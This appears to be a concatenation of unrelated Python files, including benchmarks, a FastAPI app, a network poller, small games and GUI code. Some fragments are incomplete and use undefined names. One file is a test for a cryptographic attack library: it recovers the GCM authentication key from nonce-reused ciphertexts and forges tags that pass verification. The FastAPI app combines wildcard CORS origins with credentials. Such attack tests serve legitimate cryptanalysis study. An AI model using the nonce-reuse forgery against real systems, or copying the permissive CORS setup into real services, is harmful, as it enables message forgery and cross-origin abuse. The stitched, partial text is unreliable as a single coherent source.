unsigned_observations_bytes = unsigned_observations.tobytes() # type: bytes
# 1.2us
#hex_encoded = unsigned_observations_bytes.hex() # type: str
#def f1():
# # type: () -> str
# return unsigned_observations_bytes.hex()
#t = timeit.timeit(f1,number=loops)
#print(f'f1 bytes.hex() elapsed time: {1e6*t/loops} us')
# 1.3us, fast enough i guess
#hexlified = binascii.hexlify(unsigned_observations_bytes) # type: bytes
def f2():
    # type: () -> bytes
    return binascii.hexlify(unsigned_observations_bytes)
t = timeit.timeit(f2,number=loops)
print(f'f2 binascii.hexlify() elapsed time: {1e6*t/loops} us')
def readfile5():
    # type: () -> List[bytes]
    with open('db1.csv', 'rb') as datafile: # type: IO[bytes]
        return datafile.readlines()
# Pull the 4th whitespace-separated field of the first row: the hex-encoded
# observation payload the decode benchmarks operate on.
allrows = readfile5() # type: List[bytes]
onerow = allrows[0] # type: bytes
fields = onerow.split() # type: List[bytes]
observation_field = fields[3] # type: bytes
#hex_encoded = observation_field
#assert hex_encoded.encode() == hexlified
# 35us
#def f3a():
# # type: () -> List[int]
# return [y-128 for y in list(bytes.fromhex(hex_encoded))]
#t = timeit.timeit(f3a,number=loops)
#print(f'f3a bytes.fromhex elapsed time: {1e6*t/loops} us')
######################
# decode from hex (undo the +128 offset applied at encode time)
# 35us, fast enough i guess, i think this could be faster.
decoded_fromhex = [y-128 for y in list(binascii.unhexlify(observation_field))] # type: List[int]
def f3():
    # type: () -> List[int]
    return [y-128 for y in list(binascii.unhexlify(observation_field))]
t = timeit.timeit(f3,number=loops)
print(f'f3 unhexlify elapsed time: {1e6*t/loops} us')
########################
# cumulative sum
# 20us, winner
def f4():
    # type: () -> List[int]
    return list(itertools.accumulate(decoded_fromhex))
t = timeit.timeit(f4,number=loops)
print(f'f4 accumulate elapsed time: {1e6*t/loops} us')
# 55us, loser, 106 with ndarray conversion, really loser
def f5():
    # type: () -> List[int]
    decoded_fromhex_ndarray = np.array(decoded_fromhex) # type: ndarray[int64]
    return list(np.ndarray.cumsum(decoded_fromhex_ndarray))
t = timeit.timeit(f5,number=loops)
print(f'f5 cumsum elapsed time: {1e6*t/loops} us')
##############################
# drop an item from a 1000-element list
l = list(range(0,1000))
# 25 us
def l1():
    # type: () -> List[int]
    return [x for x in l if x != 500]
t = timeit.timeit(l1,number=loops)
print(f'l1 del elapsed time: {1e6*t/loops} us')
|
# coding=utf-8
from OTLMOW.OTLModel.Datatypes.KeuzelijstField import KeuzelijstField
from OTLMOW.OTLModel.Datatypes.KeuzelijstWaarde import KeuzelijstWaarde
# Generated with OTLEnumerationCreator. To modify: extend, do not edit
class KlNatuursteentegelGebruiksklasse(KeuzelijstField):
    """Possible values for the usage class, shape and finish of the
    natural-stone tile (Dutch source: 'Mogelijke waarden voor de
    gebruiksklasse, vorm en afwerking van de natuursteentegel.')."""
    # NOTE: generated code — the option strings below are runtime data and
    # must stay exactly as emitted by OTLEnumerationCreator.
    naam = 'KlNatuursteentegelGebruiksklasse'
    label = 'Natuursteentegel gebruiksklasse'
    objectUri = 'https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#KlNatuursteentegelGebruiksklasse'
    definition = 'Mogelijke waarden voor de gebruiksklasse, vorm en afwerking van de natuursteentegel.'
    codelist = 'https://wegenenverkeer.data.vlaanderen.be/id/conceptscheme/KlNatuursteentegelGebruiksklasse'
    options = {
        '0': KeuzelijstWaarde(invulwaarde='0',
                              label='0',
                              definitie='Keuzeoptie decoratie als gebruiksklasse van natuursteentegels.',
                              objectUri='https://wegenenverkeer.data.vlaanderen.be/id/concept/KlNatuursteentegelGebruiksklasse/0'),
        '1': KeuzelijstWaarde(invulwaarde='1',
                              label='1',
                              definitie='Keuzeoptie voetgangerszones als gebruiksklasse van natuursteentegels.',
                              objectUri='https://wegenenverkeer.data.vlaanderen.be/id/concept/KlNatuursteentegelGebruiksklasse/1'),
        '2': KeuzelijstWaarde(invulwaarde='2',
                              label='2',
                              definitie='Keuzeoptie voetgangers- en fietszones als gebruiksklasse van natuursteentegels.',
                              objectUri='https://wegenenverkeer.data.vlaanderen.be/id/concept/KlNatuursteentegelGebruiksklasse/2'),
        '3': KeuzelijstWaarde(invulwaarde='3',
                              label='3',
                              definitie='Keuzeoptie voetgangerszones, occasioneel belast door wagens en lichte voertuigen, inritten van garages als gebruiksklasse van natuursteentegels.',
                              objectUri='https://wegenenverkeer.data.vlaanderen.be/id/concept/KlNatuursteentegelGebruiksklasse/3'),
        '4': KeuzelijstWaarde(invulwaarde='4',
                              label='4',
                              definitie='Keuzeoptie voetgangerszones en marktplaatsen, occasioneel belast voor leveringen en door hulpdiensten als gebruiksklasse van natuursteentegels.',
                              objectUri='https://wegenenverkeer.data.vlaanderen.be/id/concept/KlNatuursteentegelGebruiksklasse/4'),
        '5': KeuzelijstWaarde(invulwaarde='5',
                              label='5',
                              definitie='Keuzeoptie voetgangerszones, regelmatig belast door zwaar verkeer als gebruiksklasse van natuursteentegels.',
                              objectUri='https://wegenenverkeer.data.vlaanderen.be/id/concept/KlNatuursteentegelGebruiksklasse/5'),
        '6': KeuzelijstWaarde(invulwaarde='6',
                              label='6',
                              definitie='Keuzeoptie wegen als gebruiksklasse van natuursteentegels.',
                              objectUri='https://wegenenverkeer.data.vlaanderen.be/id/concept/KlNatuursteentegelGebruiksklasse/6')
    }
|
from django.http import HttpResponse
from plogical.CyberCPLogFileWriter import CyberCPLogFileWriter as logging
class pluginManagerGlobal:
    """Dispatch a plugin signal and normalize the first meaningful hook result."""

    @staticmethod
    def globalPlug(request, eventInQuest, response=None):
        """Send *eventInQuest* to its receivers and return the first usable reply.

        Returns an HttpResponse produced by a hook, a hook's 200 status, or
        200 when no hook handled the event; any other result is logged and
        treated as a 200.
        """
        if response is None:
            hookReturn = eventInQuest.send(sender=None, request=request)
        else:
            hookReturn = eventInQuest.send(sender=None, request=request, response=response)
        for receiver, result in hookReturn:
            # BUG FIX: the original tested `if type(items[1] == HttpResponse):`
            # — type() of a bool, which is ALWAYS truthy — so every hook
            # result (including plain status ints) was returned as if it were
            # an HttpResponse and the status/logging branch was dead code.
            if isinstance(result, HttpResponse):
                return result
            if result == 200:
                return result
            logging.writeToFile('Something wrong with : ' + str(receiver) + ' on ' + str(eventInQuest))
            return 200
        return 200
|
from fastapi import FastAPI, HTTPException
from fastapi.middleware.cors import CORSMiddleware
from exchangeapi.routers.routers import router as api_router
from exchangeapi.db.mongodb_utils import connect_to_mongo, close_mongo_connection
# FastAPI application wiring: CORS, Mongo lifecycle hooks and API routes.
app = FastAPI()

app.add_middleware(
    CORSMiddleware,
    # BUG FIX: allow_origins expects a sequence of origin strings; the bare
    # string "*" only worked by accident (iterating "*" yields '*').
    allow_origins=["*"],
    allow_credentials=True,
    allow_methods=["*"],
    allow_headers=["*"],
)

# Open/close the MongoDB connection together with the application lifecycle.
app.add_event_handler("startup", connect_to_mongo)
app.add_event_handler("shutdown", close_mongo_connection)

app.include_router(api_router, prefix="/api")
|
"""
This module contains the Poller logic
"""
import asyncio
import logging
import os
import signal
from typing import Dict
from suzieq.poller.worker.inventory.inventory import Inventory
from suzieq.poller.worker.services.service_manager import ServiceManager
from suzieq.poller.worker.writers.output_worker_manager \
import OutputWorkerManager
from suzieq.shared.exceptions import SqPollerConfError
logger = logging.getLogger(__name__)
class Poller:
    """Poller is the object in charge of coordinating services, nodes and
    output worker tasks, in order to pull the data from the devices configured
    in the device inventory.
    """
    def __init__(self, userargs, cfg):
        self._validate_poller_args(userargs, cfg)
        # Set the worker id
        self.worker_id = userargs.worker_id
        # Setup poller tasks list
        self.waiting_tasks = []
        self.waiting_tasks_lock = asyncio.Lock()
        # Init the node inventory object
        self.inventory = self._init_inventory(userargs, cfg)
        # Setup poller writers
        # TODO: At the moment:
        # output_dir: is the directory used by the gather method
        # data_dir: is the directory used by parquet
        # we need a way to define the settings
        # for each type of output worker
        self.output_args = {
            'output_dir': userargs.output_dir,
            'data_dir': cfg.get('data-directory')
        }
        # 'gather' and 'process' runs always write via the gather output worker
        if userargs.run_once in ['gather', 'process']:
            userargs.outputs = ['gather']
        self.output_manager = OutputWorkerManager(userargs.outputs,
                                                  self.output_args)
        self.output_queue = self.output_manager.output_queue
        # Initialize service manager
        service_dir = cfg['service-directory']
        svc_schema_dir = cfg.get('schema-directory', None)
        default_svc_period = cfg.get('poller', {}).get('period', 15)
        run_mode = userargs.run_once or 'forever'
        svc_manager_args = {
            'service_only': userargs.service_only,
            'exclude_services': userargs.exclude_services
        }
        self.service_manager = ServiceManager(self._add_poller_task,
                                              service_dir,
                                              svc_schema_dir,
                                              self.output_queue,
                                              run_mode,
                                              default_svc_period,
                                              **svc_manager_args)
    async def init_poller(self):
        """Initialize the poller, instantiating the services and setting up
        the connection with the nodes. This function should be called only
        at the beginning before calling run().
        """
        logger.info('Initializing poller')
        init_tasks = []
        init_tasks.append(self.inventory.build_inventory())
        init_tasks.append(self.service_manager.init_services())
        nodes, services = await asyncio.gather(*init_tasks)
        if not nodes or not services:
            # Logging should've been done by init_nodes/services for details
            # BUG FIX: the two concatenated string literals were missing a
            # separating space ("no nodesor services found").
            raise SqPollerConfError('Terminating because no nodes '
                                    'or services found')
    async def run(self):
        """Start polling the devices.
        Before running this function the poller should be initialized.
        """
        # Add the node list in the services
        await self.service_manager.set_nodes(self.inventory.get_node_callq())
        logger.info('Suzieq Started')
        # When the poller receives a termination signal, we would like
        # to gracefully terminate all the tasks, i.e. closing all the
        # connections with nodes.
        loop = asyncio.get_event_loop()
        for s in [signal.SIGTERM, signal.SIGINT]:
            loop.add_signal_handler(
                s, lambda s=s: asyncio.create_task(self._stop()))
        # Schedule the tasks to run
        await self.inventory.schedule_nodes_run()
        await self.service_manager.schedule_services_run()
        await self._add_poller_task([self.output_manager.run_output_workers()])
        try:
            # The logic below of handling the writer worker task separately
            # is to ensure we can terminate properly when all the other
            # tasks have finished as in the case of using file input
            # instead of SSH
            tasks = await self._pop_waiting_poller_tasks()
            while tasks:
                try:
                    _, pending = await asyncio.wait(
                        tasks, return_when=asyncio.FIRST_COMPLETED)
                    tasks = list(pending)
                    running_svcs = self.service_manager.running_services
                    # Keep looping while at least one service task is still
                    # pending; otherwise only writers remain and we can stop.
                    # pylint: disable=protected-access
                    if tasks and any(i._coro in running_svcs
                                     for i in tasks):
                        continue
                    break
                except asyncio.CancelledError:
                    break
        except asyncio.CancelledError:
            logger.warning('Received terminate signal. Terminating...')
    async def _add_poller_task(self, tasks):
        """Add new tasks to be executed in the poller run loop."""
        await self.waiting_tasks_lock.acquire()
        self.waiting_tasks += tasks
        self.waiting_tasks_lock.release()
    def _init_inventory(self, userargs, cfg):
        """Build the inventory object from CLI args and configuration."""
        # Define the dictionary with the settings
        # for any kind of inventory source
        connect_timeout = cfg.get('poller', {}).get('connect-timeout', 15)
        inventory_args = {
            'connect_timeout': connect_timeout,
            'ssh_config_file': userargs.ssh_config_file,
        }
        # Retrieve the specific inventory source to use
        inv_types = Inventory.get_plugins()
        inventory_class = None
        source_args = {}
        if userargs.input_dir:
            # 'dir' is not a real inventory source
            # we need to override the Inventory class
            # in order to simulate nodes providing the data
            # inside the specified input directory.
            inventory_class = inv_types['dir']
            source_args = {'input_dir': userargs.input_dir}
        else:
            mgr_cfg = cfg.get('poller', {}).get('manager', {})
            type_to_use = mgr_cfg.get('type', 'static')
            inventory_class = inv_types.get(type_to_use)
            if not inventory_class:
                raise SqPollerConfError(f'No inventory {type_to_use} found')
            source_args = {
                **mgr_cfg,
                'worker-id': self.worker_id
            }
        return inventory_class(self._add_poller_task,
                               **source_args,
                               **inventory_args)
    async def _pop_waiting_poller_tasks(self):
        """Empty the list of tasks to be added in the run loop
        and return its content.
        """
        # Since the function is asynchronous and we need to
        # read the content of the task list and, at the end, empty
        # it, we need to handle concurrency. Otherwise we risk to loose
        # all the tasks added after the list has been read, but before
        # the list emptying.
        await self.waiting_tasks_lock.acquire()
        poller_tasks = self.waiting_tasks
        self.waiting_tasks = []
        self.waiting_tasks_lock.release()
        return poller_tasks
    async def _stop(self):
        """Stop the poller"""
        tasks = [t for t in asyncio.all_tasks()
                 if t is not asyncio.current_task()]
        for task in tasks:
            task.cancel()
    def _validate_poller_args(self, userargs: Dict, _):
        """Validate the arguments and the configuration passed to the poller.
        The function produces a SqPollerConfError exception if there is
        something wrong in the configuration.
        Args:
            userargs (Dict): Dictionary containing the arguments passed to the
                poller
            cfg (Dict): The content of the Suzieq configuration file
        Raises:
            SqPollerConfError: raise when the configuration is not valid
        """
        if userargs.ssh_config_file:
            # BUG FIX: expand '~' BEFORE checking existence; the original
            # called os.access() on the raw value, so '~/...' paths always
            # failed the existence check.
            ssh_config_file = os.path.expanduser(userargs.ssh_config_file)
            if not os.access(ssh_config_file, os.F_OK):
                raise SqPollerConfError(
                    f'Unable to read ssh config in {userargs.ssh_config_file}'
                )
            # Reject group/other permission bits on the containing directory.
            if (os.stat(
                    os.path.dirname(
                        ssh_config_file)).st_mode | 0o40700 != 0o40700):
                raise SqPollerConfError(
                    'ssh directory has wrong permissions, must be 0700'
                )
|
#!/usr/bin/env python3
"""
Sultanov Andriy
MIT License 2020
"""
def main():
    """Demo driver for the Library API.

    NOTE(review): `Library` is not imported anywhere in this file — it
    presumably lives in a sibling module; confirm and add the import.
    """
    # Creating a new library instance
    library = Library()
    # Adding a new book
    library.add_book("Macbeth", "Macbeth.txt", "Shakespeare, William", 1606)
    # Created a new Category Author Shakespeare, William
    # Created a new Category Year 1606
    print(library.authors_list)
    # "CategoryList Authors: Category Shakespeare, William, contains these books <Macbeth, 1606>
    # Getting the list of all published years categories
    print(library.published_years)
    # "CategoryList Publication Years: Category 1606, contains these books <Macbeth, 1606>
    # Reading the text of the book
    for book in library.published_years[1606]:
        with open(book.filename, "r") as file:
            # BUG FIX: `file.read` (no parentheses) bound the method object
            # instead of reading the file; call it.
            text = file.read()
    # Reading the text of the book
    for book in library.authors_list["Shakespeare, William"]:
        with open(book.filename, "r") as file:
            text = file.read()

if __name__ == '__main__':
    main()
|
#!/usr/bin/python
from __future__ import absolute_import, division, print_function
import subprocess
from builtins import bytes, range
from os.path import abspath, dirname
from os.path import join as join_path
from random import randint
from CryptoAttacks.Block.gcm import *
from CryptoAttacks.Utils import log
def test_polynomials():
    """Exercise GF(2^k) element arithmetic, representation round-trips, and
    Polynomial_128 (polynomial-over-field) operations."""
    print("Test polynomials")
    # GF(2^128) with the GCM reduction polynomial x^128 + x^7 + x^2 + x + 1.
    Pmod = GF_2k_generator(128, [128,7,2,1,0])
    P = Pmod(0b10011010101100110100100110011101100110010111111000111011101000000110110100010101000101100100111100011001010100100110100111011000)
    Q = Pmod(0b01111010101010110111000011011100010011101111000001010000011000010000111010001111100001111010110001001000011101000011111110010101)
    print(P.to_bits(), bin(P.to_int()), P)
    print(Q.to_bits(), bin(Q.to_int()), Q)
    # Field multiplication.
    w = P*Q
    print(w.to_bits(), bin(w.to_int()), w)
    # Round-trips: an element rebuilt from its coefficient list, its integer
    # form, or its byte form must end up with identical coefficients.
    assert Q.coefficients == Pmod(Q.coefficients).coefficients
    assert Q.coefficients == Pmod(Q.to_int()).coefficients
    assert Q.coefficients == Pmod(Q.to_bytes()).coefficients
    print('')
    # Smaller field so polynomial arithmetic output stays readable.
    Pmod = GF_2k_generator(10, [11,7,2,1,0])
    c1 = Pmod(1)
    c2 = Pmod(0)
    c3 = Pmod(0)
    c4 = Pmod(0)
    polynomial1 = Polynomial_128([c1,c2,c3,c4])
    c1 = Pmod(1236)
    c2 = Pmod(0)
    c3 = Pmod(0)
    c4 = Pmod(0)
    polynomial2 = Polynomial_128([c1,c2,c3,c4])
    print(polynomial1)
    print(polynomial2)
    print("+", polynomial1 + polynomial2)
    print("*", polynomial1 * polynomial2)
    # Division with remainder; polynomial2*q + r should reproduce polynomial1
    # (printed below for visual comparison rather than asserted).
    q = polynomial1 / polynomial2
    r = polynomial1 % polynomial2
    print("/", q)
    print("%", r)
    print('')
    print(polynomial1)
    print(polynomial2*q + r)
    print('')
def test_gcm():
    """Round-trip GCM encrypt/verify and the poly-block conversion helpers."""
    print("Test GCM")
    msg = bytes(b'hn9YA(F BW&B (W&&W(RT&WEF f7*WB FTgsdc')
    aad = bytes(b'j gej8g0SRYH8s 8s9yf sgd78taDS* GASyd ')
    aes_key = bytes(b'xgrtjdh&LA28XNwh')
    iv = bytes(b'a drO*1@((js')

    ct, auth_tag = gcm_encrypt(msg, aad, aes_key, iv)
    assert gcm_verify(auth_tag, ct, aad, aes_key, iv)

    # Converting ciphertext+AAD to polynomial blocks and back must be lossless.
    round_trip_ct, round_trip_aad = poly_blocks_to_aes_bytes(
        aes_bytes_to_poly_blocks(ct, aad))
    assert ct == round_trip_ct
    assert aad == round_trip_aad
def polynomial_factors_product(factorization):
    """Multiply out a factorization given as [(poly1, power), (poly2, power)]."""
    # Start from the multiplicative identity of the polynomials' field.
    product = factorization[0][0].one_element()
    for factor, multiplicity in factorization:
        product = product * factor ** multiplicity
    return product
def test_factor():
    """Factor the product of two GF(2^9)[x] polynomials and verify the result."""
    print("Test factor")
    field = GF_2k_generator(9, [9,7,2,1,0])
    poly_a = Polynomial_128([field(31), field(0), field(0), field(3)])
    poly_b = Polynomial_128([field(237), field(1), field(0), field(10)])
    product = poly_a * poly_b
    for shown in (poly_a, poly_b, product, product.monic()):
        print(shown)
    print('')

    factorization = factor_polynomial(product)
    print(factorization)
    # Rebuild the polynomial from its factors and show it alongside.
    rebuilt = product.one_element()
    for factor, multiplicity in factorization:
        rebuilt *= factor ** multiplicity
    print(rebuilt)
    print('')
    # Factoring normalizes to the monic polynomial, so compare against that.
    assert polynomial_factors_product(factorization) == product.monic()
def test_repeated_nonce():
    """Key-recovery ("forbidden") attack on GCM when a nonce is reused."""
    print("Test Key-Recovery Attack on GCM with Repeated Nonces")
    # Repeat the whole experiment a few times with fresh random material.
    for _ in range(3):
        nonce = random_bytes(12)
        key = random_bytes(16)
        # Ground-truth authentication key: AES-ECB encryption of the zero
        # block, lifted to a field polynomial.
        h = bytes(AES.new(key, AES.MODE_ECB).encrypt(bytes(b'\x00'*16)))
        h = aes_polynomial(h)
        # Collect several messages encrypted under the SAME key and nonce.
        ciphertexts_additionals_tags = []
        for _ in range(4):
            plaintext = random_bytes(randint(0, 50))
            additional = random_bytes(randint(0, 50))
            ciphertext, tag = gcm_encrypt(plaintext, additional, key, nonce)
            ciphertexts_additionals_tags.append((ciphertext, additional, tag))
        valid_ciphertext, valid_additional, valid_tag = ciphertexts_additionals_tags[0]
        # The attack yields a set of candidates; the true auth key must be in it.
        auth_key_candidates = recover_key_repated_nonce(ciphertexts_additionals_tags)
        assert h.to_bytes() in auth_key_candidates
        # try found auth key candidates: at least one of them must let us
        # forge a tag that the real key/nonce pair accepts.
        correct_auth_key_found = False
        for auth_key in auth_key_candidates:
            forged_ciphertext = random_bytes(randint(0, 10))
            forged_additional = random_bytes(randint(0, 10))
            forged_tag = gcm_forge_tag(ciphertext=forged_ciphertext, additional=forged_additional, auth_key=auth_key,
                                       valid_ciphertext=valid_ciphertext, valid_additional=valid_additional, valid_tag=valid_tag)
            if gcm_verify(forged_tag, forged_ciphertext, forged_additional, key, nonce):
                correct_auth_key_found = True
                break
        assert correct_auth_key_found
def run():
    """Execute every GCM attack test with debug logging enabled."""
    log.level = 'debug'
    for test_case in (test_polynomials, test_gcm, test_factor,
                      test_repeated_nonce):
        test_case()


if __name__ == "__main__":
    run()
|
# JO-KEN-PO (rock-paper-scissors)
import time
import random

lista = ("PEDRA", "PAPEL", "TESOURA")
pcopcao = random.randint(0, 2)
print('''Suas opções:
[ 0 ] PEDRA
[ 1 ] PAPEL
[ 2 ] TESOURA''')
opcao = int(input('Qual a sua jogada? '))
# BUG FIX: the original crashed with IndexError on any input outside 0-2.
if opcao not in (0, 1, 2):
    print('Jogada inválida! Escolha 0, 1 ou 2.')
else:
    # Dramatic countdown, one word per second.
    for grito in ("JO", "KEN", "PO!"):
        time.sleep(1)
        print(grito)
    time.sleep(1)
    print('-=' * 15)
    print('Computador jogou {}'.format(lista[pcopcao]))
    print('Jogador jogou {}'.format(lista[opcao]))
    print('-=' * 15)
    # Rock-paper-scissors outcome in one expression:
    # (opcao - pcopcao) % 3 == 0 -> draw, 1 -> player wins, 2 -> computer wins.
    resultado = (opcao - pcopcao) % 3
    if resultado == 0:
        print("EMPATE")
    elif resultado == 1:
        print("JOGADOR GANHOU")
    else:
        print("COMPUTADOR GANHOU")
|
#!/usr/bin/env python3
"""Create an Aruco markers for testing.
It can create a single marker or a pair for easy testing.
"""
__author__ = "Steve Geyer"
__copyright__ = "Copyright 2019, Steve Geyer"
__credits__ = ["Steve Geyer"]
__license__ = "BSD 3-Clause License"
__version__ = "1.0.0"
__status__ = "Development"
import argparse
import matplotlib as mpl
import matplotlib.pyplot as plt
import cv2
from cv2 import aruco
def main():
    """Parse arguments and create one Aruco marker (PNG) or a pair (PDF).

    Single-marker mode writes a 700px PNG via OpenCV; pair mode lays the
    same marker out twice (leftmost and rightmost of 4 slots) in a
    matplotlib figure saved as PDF, for easy side-by-side test prints.
    """
    aruco_dict = aruco.Dictionary_get(aruco.DICT_6X6_250)
    parser = argparse.ArgumentParser(description='Create aruco fiducial markers')
    parser.add_argument('-b', '--basename',
                        help='basename for file (an extension is added)',
                        required=False, default='marker')
    parser.add_argument('-i', '--id', type=int, help='marker ID',
                        required=False, default=1)
    parser.add_argument('-p', '--pair', help='create a pair of markers',
                        required=False, action='store_true')
    args = parser.parse_args()
    # drawMarker is deterministic for a given dict/id/size, so render once
    # (the original called it twice in pair mode).
    img = aruco.drawMarker(aruco_dict, args.id, 700)
    if not args.pair:
        filename = args.basename + '.png'
        cv2.imwrite(filename, img)
        print('Created ID %d marker into file %s' % (args.id, filename))
    else:
        # FIX: only build the matplotlib figure when it is actually used;
        # the original created (and leaked) one even in single-marker mode.
        fig = plt.figure()
        for slot in (1, 4):
            ax = fig.add_subplot(1, 4, slot)
            plt.imshow(img, cmap=mpl.cm.gray, interpolation='nearest')
            ax.axis('off')
        filename = args.basename + '.pdf'
        plt.savefig(filename)
        print('Created pair of ID %d markers into file %s' % (args.id, filename))


if __name__ == "__main__":
    main()
|
from PolyEdit3D.Widgets.PlyToolPanel import PlyViewportToolPanel, PlyBtnSetWireView, PlyBtnDrawPlaneByVector
from PolyEdit3D.GL.Renderer import PlyRenderer, PlyViewportCamera
from PolyEdit3D.GL.Elements import PlySceneAxisDots, PlySceneAxisLines, PlySceneGrid
from PolyEdit3D.GL.GeometryEngine import GeometryEngine, PlyEditEnum
from PolyEdit3D.GL.Elements.SceneElements.TMPPlane import TMPPlane
from OpenGL import GL as gl
from PySide2 import QtWidgets, QtCore, QtGui
class PlyViewportWidget(QtWidgets.QOpenGLWidget):
    """Main 3D scene viewer.

    Hosts the renderer, camera and geometry engine; routes mouse/keyboard
    input into camera navigation and plane-drawing edits.
    """

    def __init__(self):
        super(PlyViewportWidget, self).__init__(parent=None)
        # --- Setup widget attributes ---
        self.setAttribute(QtCore.Qt.WA_Hover)
        self.installEventFilter(self)

        # -- Init viewport tool panel --
        self.toolPanel = PlyViewportToolPanel(self)

        # - Wireframe button setup -
        self.btnWire = PlyBtnSetWireView(parent=self)
        self.btnWire.clicked.connect(self.onGeoModeChanged)

        self.btnPlnVec = PlyBtnDrawPlaneByVector(parent=self)
        self.btnPlnVec.clicked.connect(self.onPlaneVecDrawStateChanged)

        self.editState = PlyEditEnum.IDLE
        self.geoEngine = GeometryEngine()

        self.renderer = PlyRenderer()
        self.camera = PlyViewportCamera()

        # GL scene elements are created lazily in initializeGL(), once a
        # GL context exists.
        self.grid = None
        self.scene_dots = None
        self.scene_lines = None

        # Objects the user has drawn; rendered every frame before the grid.
        self.draw_list = list()

        self.first_point = QtGui.QVector3D()
        self.move_point = QtGui.QVector3D()

        self.__initUI()

    def __initUI(self):
        """Setup user interface inside the viewport."""
        self.toolPanel.addButton(self.btnPlnVec, hasSpacer=True)
        self.toolPanel.addButton(self.btnWire, hasSpacer=True)
        self.setLayout(QtWidgets.QHBoxLayout())
        self.layout().setAlignment(QtCore.Qt.AlignLeft | QtCore.Qt.AlignVCenter)
        self.layout().addWidget(self.toolPanel)

    def initializeGL(self):
        """Create GL-backed scene elements now that a context is current."""
        self.renderer.clear()
        self.grid = PlySceneGrid()
        self.scene_dots = PlySceneAxisDots()
        self.scene_lines = PlySceneAxisLines()

    def paintGL(self):
        """Render user objects, then the grid and axis decorations."""
        self.renderer.init()
        self.renderer.clear()
        self.camera.updateCamera()
        for obj in self.draw_list:
            self.renderer.draw(obj, self.camera)
        self.renderer.draw(self.grid, self.camera)
        self.renderer.draw(self.scene_dots, self.camera, draw_type=gl.GL_POINTS)
        self.renderer.draw(self.scene_lines, self.camera, draw_type=gl.GL_LINES)

    def resizeGL(self, w: int, h: int):
        self.camera.setProjection(w, h)

    def eventFilter(self, watched: QtCore.QObject, event: QtCore.QEvent) -> bool:
        """Grab keyboard focus while hovered so key events reach this widget."""
        if event.type() == QtCore.QEvent.HoverEnter:
            self.setFocus()
        elif event.type() == QtCore.QEvent.HoverLeave:
            # BUG FIX: the original compared `event.type() == QtCore.QEvent`
            # (the class itself), which is never true, so focus was never
            # released when the cursor left the viewport.
            self.clearFocus()
        return super(PlyViewportWidget, self).eventFilter(watched, event)

    def keyPressEvent(self, event: QtGui.QKeyEvent):
        # Shift enables camera panning (see mouseMoveEvent).
        if event.key() == QtCore.Qt.Key_Shift:
            self.camera.isPanEnabled = True
            print(self.geoEngine.currentObject)

    def keyReleaseEvent(self, event: QtGui.QKeyEvent):
        if event.key() == QtCore.Qt.Key_Shift:
            self.camera.isPanEnabled = False

    def mousePressEvent(self, event: QtGui.QMouseEvent):
        self.makeCurrent()
        self.camera.mousePos = QtGui.QVector2D(event.localPos())
        # Right-click in plane-draw mode starts a new plane at the point
        # where the view ray hits the grid.
        if event.buttons() == QtCore.Qt.RightButton and self.editState == PlyEditEnum.DRAW_PLANE:
            click_pos = self.camera.getRayGridIntersecton(self.camera.mousePos)
            self.geoEngine.startPoint = click_pos
            self.geoEngine.movePoint = click_pos
            self.geoEngine.setObject(TMPPlane())
            self.geoEngine.setScaleByScalar(0.0)
            self.geoEngine.setTranslationByVector(click_pos)
            self.draw_list.append(self.geoEngine.currentObject)
        self.update()

    def mouseReleaseEvent(self, event: QtGui.QMouseEvent):
        if event.button() == QtCore.Qt.RightButton and self.editState == PlyEditEnum.DRAW_PLANE:
            self.geoEngine.releaseObject()
        self.update()

    def mouseMoveEvent(self, event: QtGui.QMouseEvent):
        # Right-drag: grow the plane being drawn (in plane-draw mode).
        if event.buttons() == QtCore.Qt.RightButton and self.editState == PlyEditEnum.DRAW_PLANE:
            self.geoEngine.planeFromVector(self.camera.getRayGridIntersecton(QtGui.QVector2D(event.localPos())))
        # Left-drag: orbit the camera.
        if event.buttons() == QtCore.Qt.LeftButton:
            self.camera.rotate(self.camera.mousePos, QtGui.QVector2D(event.localPos()))
            self.camera.mousePos = QtGui.QVector2D(event.localPos())
        # Right-drag with Shift held (isPanEnabled): pan the camera.
        if event.buttons() == QtCore.Qt.RightButton and self.camera.isPanEnabled:
            self.camera.pan(self.camera.mousePos, QtGui.QVector2D(event.localPos()))
        self.update()

    def wheelEvent(self, event: QtGui.QWheelEvent):
        self.camera.zoom(event.delta())
        self.update()

    # TODO: Draw wireframe as a texture
    def onGeoModeChanged(self, ):
        """Action to perform on 'Wireframe' button click.
        Change viewport's polygon mode fill."""
        self.makeCurrent()
        if not self.btnWire.isChecked():
            gl.glPolygonMode(gl.GL_FRONT_AND_BACK, gl.GL_FILL)
            self.update()
            return
        gl.glPolygonMode(gl.GL_FRONT_AND_BACK, gl.GL_LINE)
        self.update()

    def onPlaneVecDrawStateChanged(self):
        """Toggle between idle and plane-drawing edit states."""
        if self.btnPlnVec.isChecked() and self.editState == PlyEditEnum.IDLE:
            self.editState = PlyEditEnum.DRAW_PLANE
        if not self.btnPlnVec.isChecked() and self.editState == PlyEditEnum.DRAW_PLANE:
            self.editState = PlyEditEnum.IDLE
        self.update()
|
class Solution:
    """Search for a target in a matrix whose rows and columns are sorted ascending."""

    @staticmethod
    def search_matrix(matrix, target):
        """Return True if target occurs in matrix, using the O(rows+cols) search."""
        # FIX: removed the unreachable `pass` that followed this return.
        return Solution.upper_right_solution(matrix, target)

    @staticmethod
    def simple_solution(matrix, target):
        """Brute-force O(rows*cols) scan, kept as a reference implementation."""
        for row in matrix:
            for item in row:
                if item == target:
                    return True
        return False

    @staticmethod
    def upper_right_solution(matrix, target):
        """O(rows+cols) search starting from the top-right corner.

        The top-right element is the largest of its row and the smallest of
        its column: if it exceeds target, the whole column can be discarded;
        if it is below target, the whole row can be discarded.
        """
        row_index = 0
        row_num = len(matrix)
        if row_num == 0:
            return False
        column_index = len(matrix[0]) - 1
        while row_index < row_num and column_index >= 0:
            if matrix[row_index][column_index] == target:
                return True
            elif matrix[row_index][column_index] > target:
                column_index -= 1
            else:
                row_index += 1
        return False
if __name__ == '__main__':
    # Demo run on the classic sorted-matrix example; prints True (5 is present).
    sample = [
        [1, 4, 7, 11, 15],
        [2, 5, 8, 12, 19],
        [3, 6, 9, 16, 22],
        [10, 13, 14, 17, 24],
        [18, 21, 23, 26, 30],
    ]
    print(Solution.search_matrix(sample, 5))
|
from django.shortcuts import render, redirect
from django.urls import reverse
from django.views.generic import CreateView
from django.contrib import messages
from django.contrib.auth import login
from django.contrib.auth.decorators import login_required
from django.views.generic.detail import DetailView
from .models import Staff, User, StaffVerification
from .forms import (
UserRegistrationForm, TeacherSignUpForm,
StaffVerificationForm, StaffSignatureUpload
)
from activities.models import Transcript
from .utils import check_academicgroup_staff
